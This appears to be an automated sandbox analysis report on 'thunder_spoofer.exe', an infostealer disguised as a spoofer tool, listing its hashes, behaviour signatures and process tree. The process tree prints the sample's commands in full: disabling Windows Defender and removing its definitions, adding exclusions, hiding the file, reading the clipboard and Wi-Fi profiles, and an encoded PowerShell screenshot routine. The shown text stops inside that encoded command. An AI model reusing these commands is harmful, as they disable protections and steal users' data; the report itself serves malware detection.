Analysis
-
max time kernel
94s -
max time network
142s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
25-12-2024 23:14
Behavioral task
behavioral1
Sample
thunder_spoofer.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
thunder_spoofer.exe
Resource
win10v2004-20241007-en
General
-
Target
thunder_spoofer.exe
-
Size
7.4MB
-
MD5
9cc49342e97f2f55404e002037e348b6
-
SHA1
e53603b32c7bdbd7ad80aee516a721d205dc15a2
-
SHA256
4c0823ae37b673627a8203606c3f852c70e8d6908eae446cb24cda7538e2b1da
-
SHA512
72bded4aaa8a745099482a676b7cd3cbd9acd3ba619903fa7620832bffaca9f849884e90977402100e4da075d3493f2aeca4dd79ee863b50f06b69a22302bc14
-
SSDEEP
98304:vNeYgI6OshoKyDvuIYc5AhV+gEc4kZvRLoI0EJfNA3z5UTbJ7Bv9JTSPhlVtQo1Q:voYmOshoKMuIkhVastRL5Di3tKJtSPJI
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4392 powershell.exe 1768 powershell.exe 5072 powershell.exe 228 powershell.exe 2340 powershell.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts thunder_spoofer.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 4792 cmd.exe 3056 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 3176 rar.exe -
Loads dropped DLL 17 IoCs
pid Process 3848 thunder_spoofer.exe 3848 thunder_spoofer.exe 3848 thunder_spoofer.exe 3848 thunder_spoofer.exe 3848 thunder_spoofer.exe 3848 thunder_spoofer.exe 3848 thunder_spoofer.exe 3848 thunder_spoofer.exe 3848 thunder_spoofer.exe 3848 thunder_spoofer.exe 3848 thunder_spoofer.exe 3848 thunder_spoofer.exe 3848 thunder_spoofer.exe 3848 thunder_spoofer.exe 3848 thunder_spoofer.exe 3848 thunder_spoofer.exe 3848 thunder_spoofer.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 27 discord.com 28 discord.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 9 ip-api.com 25 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 5 IoCs
pid Process 4964 tasklist.exe 1936 tasklist.exe 3524 tasklist.exe 3852 tasklist.exe 2940 tasklist.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
pid Process 2984 cmd.exe -
resource yara_rule behavioral2/files/0x0007000000023cc0-21.dat upx behavioral2/memory/3848-25-0x00007FF815190000-0x00007FF815779000-memory.dmp upx behavioral2/files/0x0007000000023cb5-28.dat upx behavioral2/files/0x0007000000023cbe-31.dat upx behavioral2/memory/3848-32-0x00007FF82D610000-0x00007FF82D61F000-memory.dmp upx behavioral2/memory/3848-30-0x00007FF829A30000-0x00007FF829A53000-memory.dmp upx behavioral2/files/0x0007000000023cb8-38.dat upx behavioral2/memory/3848-40-0x00007FF828C10000-0x00007FF828C3D000-memory.dmp upx behavioral2/files/0x0007000000023cb4-41.dat upx behavioral2/memory/3848-44-0x00007FF829930000-0x00007FF829949000-memory.dmp upx behavioral2/files/0x0007000000023cbb-43.dat upx behavioral2/memory/3848-47-0x00007FF823EA0000-0x00007FF823EC3000-memory.dmp upx behavioral2/files/0x0007000000023cc3-46.dat upx behavioral2/memory/3848-49-0x00007FF8234A0000-0x00007FF823617000-memory.dmp upx behavioral2/files/0x0007000000023cba-50.dat upx behavioral2/memory/3848-52-0x00007FF827A40000-0x00007FF827A59000-memory.dmp upx behavioral2/files/0x0007000000023cc2-53.dat upx behavioral2/memory/3848-55-0x00007FF8289E0000-0x00007FF8289ED000-memory.dmp upx behavioral2/files/0x0007000000023cbc-56.dat upx behavioral2/files/0x0007000000023cbd-58.dat upx behavioral2/memory/3848-60-0x00007FF823DC0000-0x00007FF823DF3000-memory.dmp upx behavioral2/files/0x0007000000023cbf-59.dat upx behavioral2/memory/3848-68-0x00007FF829A30000-0x00007FF829A53000-memory.dmp upx behavioral2/memory/3848-67-0x00007FF814C70000-0x00007FF815190000-memory.dmp upx behavioral2/memory/3848-65-0x00007FF823800000-0x00007FF8238CD000-memory.dmp upx behavioral2/memory/3848-64-0x00007FF815190000-0x00007FF815779000-memory.dmp upx behavioral2/files/0x0007000000023cc4-75.dat upx behavioral2/memory/3848-77-0x00007FF823380000-0x00007FF82349C000-memory.dmp upx behavioral2/memory/3848-74-0x00007FF827C10000-0x00007FF827C1D000-memory.dmp upx behavioral2/files/0x0007000000023cb9-73.dat upx behavioral2/memory/3848-72-0x00007FF823E80000-0x00007FF823E94000-memory.dmp upx behavioral2/files/0x0007000000023cb7-70.dat upx behavioral2/memory/3848-103-0x00007FF823EA0000-0x00007FF823EC3000-memory.dmp upx behavioral2/memory/3848-116-0x00007FF8234A0000-0x00007FF823617000-memory.dmp upx behavioral2/memory/3848-189-0x00007FF827A40000-0x00007FF827A59000-memory.dmp upx behavioral2/memory/3848-274-0x00007FF823DC0000-0x00007FF823DF3000-memory.dmp upx behavioral2/memory/3848-280-0x00007FF823800000-0x00007FF8238CD000-memory.dmp upx behavioral2/memory/3848-296-0x00007FF814C70000-0x00007FF815190000-memory.dmp upx behavioral2/memory/3848-331-0x00007FF823380000-0x00007FF82349C000-memory.dmp upx behavioral2/memory/3848-323-0x00007FF8234A0000-0x00007FF823617000-memory.dmp upx behavioral2/memory/3848-317-0x00007FF815190000-0x00007FF815779000-memory.dmp upx behavioral2/memory/3848-318-0x00007FF829A30000-0x00007FF829A53000-memory.dmp upx behavioral2/memory/3848-332-0x00007FF815190000-0x00007FF815779000-memory.dmp upx behavioral2/memory/3848-407-0x00007FF814C70000-0x00007FF815190000-memory.dmp upx behavioral2/memory/3848-416-0x00007FF823DC0000-0x00007FF823DF3000-memory.dmp upx behavioral2/memory/3848-420-0x00007FF827C10000-0x00007FF827C1D000-memory.dmp upx behavioral2/memory/3848-421-0x00007FF823380000-0x00007FF82349C000-memory.dmp upx behavioral2/memory/3848-419-0x00007FF823E80000-0x00007FF823E94000-memory.dmp upx behavioral2/memory/3848-418-0x00007FF815190000-0x00007FF815779000-memory.dmp upx behavioral2/memory/3848-417-0x00007FF823800000-0x00007FF8238CD000-memory.dmp upx behavioral2/memory/3848-415-0x00007FF8289E0000-0x00007FF8289ED000-memory.dmp upx behavioral2/memory/3848-414-0x00007FF827A40000-0x00007FF827A59000-memory.dmp upx behavioral2/memory/3848-413-0x00007FF8234A0000-0x00007FF823617000-memory.dmp upx behavioral2/memory/3848-412-0x00007FF823EA0000-0x00007FF823EC3000-memory.dmp upx behavioral2/memory/3848-411-0x00007FF829930000-0x00007FF829949000-memory.dmp upx behavioral2/memory/3848-410-0x00007FF828C10000-0x00007FF828C3D000-memory.dmp upx behavioral2/memory/3848-409-0x00007FF82D610000-0x00007FF82D61F000-memory.dmp upx behavioral2/memory/3848-408-0x00007FF829A30000-0x00007FF829A53000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 748 cmd.exe 1656 PING.EXE -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 952 cmd.exe 2944 netsh.exe -
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1856 WMIC.exe 4796 WMIC.exe 1644 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 4880 systeminfo.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1656 PING.EXE -
Suspicious behavior: EnumeratesProcesses 20 IoCs
pid Process 5072 powershell.exe 5072 powershell.exe 4392 powershell.exe 4392 powershell.exe 1768 powershell.exe 1768 powershell.exe 3056 powershell.exe 3056 powershell.exe 3056 powershell.exe 4668 powershell.exe 4668 powershell.exe 4668 powershell.exe 228 powershell.exe 228 powershell.exe 2664 powershell.exe 2664 powershell.exe 2340 powershell.exe 2340 powershell.exe 4836 powershell.exe 4836 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3524 tasklist.exe Token: SeDebugPrivilege 5072 powershell.exe Token: SeIncreaseQuotaPrivilege 4984 WMIC.exe Token: SeSecurityPrivilege 4984 WMIC.exe Token: SeTakeOwnershipPrivilege 4984 WMIC.exe Token: SeLoadDriverPrivilege 4984 WMIC.exe Token: SeSystemProfilePrivilege 4984 WMIC.exe Token: SeSystemtimePrivilege 4984 WMIC.exe Token: SeProfSingleProcessPrivilege 4984 WMIC.exe Token: SeIncBasePriorityPrivilege 4984 WMIC.exe Token: SeCreatePagefilePrivilege 4984 WMIC.exe Token: SeBackupPrivilege 4984 WMIC.exe Token: SeRestorePrivilege 4984 WMIC.exe Token: SeShutdownPrivilege 4984 WMIC.exe Token: SeDebugPrivilege 4984 WMIC.exe Token: SeSystemEnvironmentPrivilege 4984 WMIC.exe Token: SeRemoteShutdownPrivilege 4984 WMIC.exe Token: SeUndockPrivilege 4984 WMIC.exe Token: SeManageVolumePrivilege 4984 WMIC.exe Token: 33 4984 WMIC.exe Token: 34 4984 WMIC.exe Token: 35 4984 WMIC.exe Token: 36 4984 WMIC.exe Token: SeDebugPrivilege 4392 powershell.exe Token: SeIncreaseQuotaPrivilege 4984 WMIC.exe Token: SeSecurityPrivilege 4984 WMIC.exe Token: SeTakeOwnershipPrivilege 4984 WMIC.exe Token: SeLoadDriverPrivilege 4984 WMIC.exe Token: SeSystemProfilePrivilege 4984 WMIC.exe Token: SeSystemtimePrivilege 4984 WMIC.exe Token: SeProfSingleProcessPrivilege 4984 WMIC.exe Token: SeIncBasePriorityPrivilege 4984 WMIC.exe Token: SeCreatePagefilePrivilege 4984 WMIC.exe Token: SeBackupPrivilege 4984 WMIC.exe Token: SeRestorePrivilege 4984 WMIC.exe Token: SeShutdownPrivilege 4984 WMIC.exe Token: SeDebugPrivilege 4984 WMIC.exe Token: SeSystemEnvironmentPrivilege 4984 WMIC.exe Token: SeRemoteShutdownPrivilege 4984 WMIC.exe Token: SeUndockPrivilege 4984 WMIC.exe Token: SeManageVolumePrivilege 4984 WMIC.exe Token: 33 4984 WMIC.exe Token: 34 4984 WMIC.exe Token: 35 4984 WMIC.exe Token: 36 4984 WMIC.exe Token: SeIncreaseQuotaPrivilege 1856 WMIC.exe Token: SeSecurityPrivilege 1856 WMIC.exe Token: SeTakeOwnershipPrivilege 1856 WMIC.exe Token: SeLoadDriverPrivilege 1856 WMIC.exe Token: SeSystemProfilePrivilege 1856 WMIC.exe Token: SeSystemtimePrivilege 1856 WMIC.exe Token: SeProfSingleProcessPrivilege 1856 WMIC.exe Token: SeIncBasePriorityPrivilege 1856 WMIC.exe Token: SeCreatePagefilePrivilege 1856 WMIC.exe Token: SeBackupPrivilege 1856 WMIC.exe Token: SeRestorePrivilege 1856 WMIC.exe Token: SeShutdownPrivilege 1856 WMIC.exe Token: SeDebugPrivilege 1856 WMIC.exe Token: SeSystemEnvironmentPrivilege 1856 WMIC.exe Token: SeRemoteShutdownPrivilege 1856 WMIC.exe Token: SeUndockPrivilege 1856 WMIC.exe Token: SeManageVolumePrivilege 1856 WMIC.exe Token: 33 1856 WMIC.exe Token: 34 1856 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1708 wrote to memory of 3848 1708 thunder_spoofer.exe 82 PID 1708 wrote to memory of 3848 1708 thunder_spoofer.exe 82 PID 3848 wrote to memory of 3492 3848 thunder_spoofer.exe 83 PID 3848 wrote to memory of 3492 3848 thunder_spoofer.exe 83 PID 3848 wrote to memory of 1408 3848 thunder_spoofer.exe 84 PID 3848 wrote to memory of 1408 3848 thunder_spoofer.exe 84 PID 3848 wrote to memory of 3968 3848 thunder_spoofer.exe 85 PID 3848 wrote to memory of 3968 3848 thunder_spoofer.exe 85 PID 3848 wrote to memory of 1384 3848 thunder_spoofer.exe 89 PID 3848 wrote to memory of 1384 3848 thunder_spoofer.exe 89 PID 3848 wrote to memory of 5020 3848 thunder_spoofer.exe 91 PID 3848 wrote to memory of 5020 3848 thunder_spoofer.exe 91 PID 1384 wrote to memory of 3524 1384 cmd.exe 93 PID 1384 wrote to memory of 3524 1384 cmd.exe 93 PID 3968 wrote to memory of 1592 3968 cmd.exe 94 PID 3968 wrote to memory of 1592 3968 cmd.exe 94 PID 3492 wrote to memory of 4392 3492 cmd.exe 95 PID 3492 wrote to memory of 4392 3492 cmd.exe 95 PID 1408 wrote to memory of 5072 1408 cmd.exe 96 PID 1408 wrote to memory of 5072 1408 cmd.exe 96 PID 5020 wrote to memory of 4984 5020 cmd.exe 98 PID 5020 wrote to memory of 4984 5020 cmd.exe 98 PID 3848 wrote to memory of 4964 3848 thunder_spoofer.exe 99 PID 3848 wrote to memory of 4964 3848 thunder_spoofer.exe 99 PID 4964 wrote to memory of 3900 4964 cmd.exe 101 PID 4964 wrote to memory of 3900 4964 cmd.exe 101 PID 3848 wrote to memory of 4440 3848 thunder_spoofer.exe 102 PID 3848 wrote to memory of 4440 3848 thunder_spoofer.exe 102 PID 4440 wrote to memory of 3708 4440 cmd.exe 104 PID 4440 wrote to memory of 3708 4440 cmd.exe 104 PID 3848 wrote to memory of 3364 3848 thunder_spoofer.exe 105 PID 3848 wrote to memory of 3364 3848 thunder_spoofer.exe 105 PID 3364 wrote to memory of 1856 3364 cmd.exe 107 PID 3364 wrote to memory of 1856 3364 cmd.exe 107 PID 3848 wrote to memory of 2800 3848 thunder_spoofer.exe 108 PID 3848 wrote to memory of 2800 3848 thunder_spoofer.exe 108 PID 2800 wrote to memory of 4796 2800 cmd.exe 110 PID 2800 wrote to memory of 4796 2800 cmd.exe 110 PID 3848 wrote to memory of 2984 3848 thunder_spoofer.exe 152 PID 3848 wrote to memory of 2984 3848 thunder_spoofer.exe 152 PID 3848 wrote to memory of 2524 3848 thunder_spoofer.exe 113 PID 3848 wrote to memory of 2524 3848 thunder_spoofer.exe 113 PID 2984 wrote to memory of 2664 2984 cmd.exe 154 PID 2984 wrote to memory of 2664 2984 cmd.exe 154 PID 2524 wrote to memory of 1768 2524 cmd.exe 116 PID 2524 wrote to memory of 1768 2524 cmd.exe 116 PID 3848 wrote to memory of 4036 3848 thunder_spoofer.exe 117 PID 3848 wrote to memory of 4036 3848 thunder_spoofer.exe 117 PID 3848 wrote to memory of 608 3848 thunder_spoofer.exe 118 PID 3848 wrote to memory of 608 3848 thunder_spoofer.exe 118 PID 4036 wrote to memory of 3852 4036 cmd.exe 121 PID 4036 wrote to memory of 3852 4036 cmd.exe 121 PID 608 wrote to memory of 2940 608 cmd.exe 122 PID 608 wrote to memory of 2940 608 cmd.exe 122 PID 3848 wrote to memory of 4772 3848 thunder_spoofer.exe 123 PID 3848 wrote to memory of 4772 3848 thunder_spoofer.exe 123 PID 3848 wrote to memory of 4792 3848 thunder_spoofer.exe 177 PID 3848 wrote to memory of 4792 3848 thunder_spoofer.exe 177 PID 4772 wrote to memory of 264 4772 cmd.exe 127 PID 4772 wrote to memory of 264 4772 cmd.exe 127 PID 3848 wrote to memory of 4144 3848 thunder_spoofer.exe 128 PID 3848 wrote to memory of 4144 3848 thunder_spoofer.exe 128 PID 4792 wrote to memory of 3056 4792 cmd.exe 129 PID 4792 wrote to memory of 3056 4792 cmd.exe 129 -
Views/modifies file attributes 1 TTPs 3 IoCs
pid Process 2664 attrib.exe 4632 attrib.exe 2456 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\thunder_spoofer.exe"C:\Users\Admin\AppData\Local\Temp\thunder_spoofer.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1708 -
C:\Users\Admin\AppData\Local\Temp\thunder_spoofer.exe"C:\Users\Admin\AppData\Local\Temp\thunder_spoofer.exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3848 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\thunder_spoofer.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:3492 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\thunder_spoofer.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4392
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:1408 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5072
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Datei konnte nicht gelesen werden.', 0, 'Fehlercode (7xAmalrkL6)', 0+16);close()""3⤵
- Suspicious use of WriteProcessMemory
PID:3968 -
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Datei konnte nicht gelesen werden.', 0, 'Fehlercode (7xAmalrkL6)', 0+16);close()"4⤵PID:1592
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:1384 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3524
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:5020 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4984
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵
- Suspicious use of WriteProcessMemory
PID:4964 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵PID:3900
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵
- Suspicious use of WriteProcessMemory
PID:4440 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵PID:3708
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:3364 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:1856
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:2800 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:4796
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\thunder_spoofer.exe""3⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:2984 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Temp\thunder_spoofer.exe"4⤵
- Views/modifies file attributes
PID:2664
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:2524 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1768
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4036 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:3852
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:608 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:2940
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:4772 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵PID:264
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:4792 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:3056
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:4144
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:4964
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:1064
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:2228
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:952 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2944
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:3840
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:4880
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵PID:1564
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:2144
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACg